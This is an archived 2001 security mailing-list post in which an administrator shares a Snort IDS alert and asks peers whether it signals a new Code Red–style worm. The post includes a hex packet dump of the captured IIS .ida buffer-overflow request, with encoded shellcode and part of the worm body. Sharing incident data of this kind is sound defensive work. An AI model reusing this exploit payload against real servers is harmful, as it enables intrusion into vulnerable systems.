Yet Another Worm ???

From: David Brown (DBrownat_private)
Date: Sun Aug 05 2001 - 17:52:29 PDT

Next message: Joe Moll: "Re: snort signature for new CodeRed varient"

Previous message: Ric Pa: "Re: Now the kiddiez started playing"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hi All,
Snort just reported an ISAPI overflow attempt here.I have specific rules in
place for all the CodeRed worms, so I had to take a look at the packet log.
Anyone else seen this one, a new worm ,or is it just a random event ?.


Rgds,
Dave

[**] IDS552/web-iis_IIS ISAPI Overflow ida [**]
08/06-10:13:55.165739 210.209.11.12:4715 -> <SNIPPED>:80
TCP TTL:109 TOS:0x0 ID:43198 IpLen:20 DgmLen:576
***A**** Seq: 0xCB1D4D1C  Ack: 0xE4E9D43F  Win: 0x4470  TcpLen: 20
47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61  GET /default.ida
3F 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  ?XXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63  X%u9090%u6858%uc
62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25  bd3%u7801%u9090%
75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30  u6858%ucbd3%u780
31 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63  1%u9090%u6858%uc
62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25  bd3%u7801%u9090%
75 39 30 39 30 25 75 38 31 39 30 25 75 30 30 63  u9090%u8190%u00c
33 25 75 30 30 30 33 25 75 38 62 30 30 25 75 35  3%u0003%u8b00%u5
33 31 62 25 75 35 33 66 66 25 75 30 30 37 38 25  31b%u53ff%u0078%
75 30 30 30 30 25 75 30 30 3D 61 20 20 48 54 54  u0000%u00=a  HTT
50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 2D 74  P/1.0..Content-t
79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A 43 6F  ype: text/xml.Co
6E 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33 33  ntent-length: 33
37 39 20 0D 0A 0D 0A C8 C8 01 00 60 E8 03 00 00  79 ........`....
00 CC EB FE 64 67 FF 36 00 00 64 67 89 26 00 00  ....dg.6..dg.&..
E8 DF 02 00 00 68 04 01 00 00 8D 85 5C FE FF FF  .....h......\...
50 FF 55 9C 8D 85 5C FE FF FF 50 FF 55 98 8B 40  P.U...\...P.U..@
10 8B 08 89 8D 58 FE FF FF FF 55 E4 3D 04 04 00  .....X....U.=...
00 0F 94 C1 3D 04 08 00 00 0F 94 C5 0A CD 0F B6  ....=...........
C9 89 8D 54 FE FF FF 8B                          ...T....

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Next message: Joe Moll: "Re: snort signature for new CodeRed varient"
Previous message: Ric Pa: "Re: Now the kiddiez started playing"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sun Aug 05 2001 - 19:42:05 PDT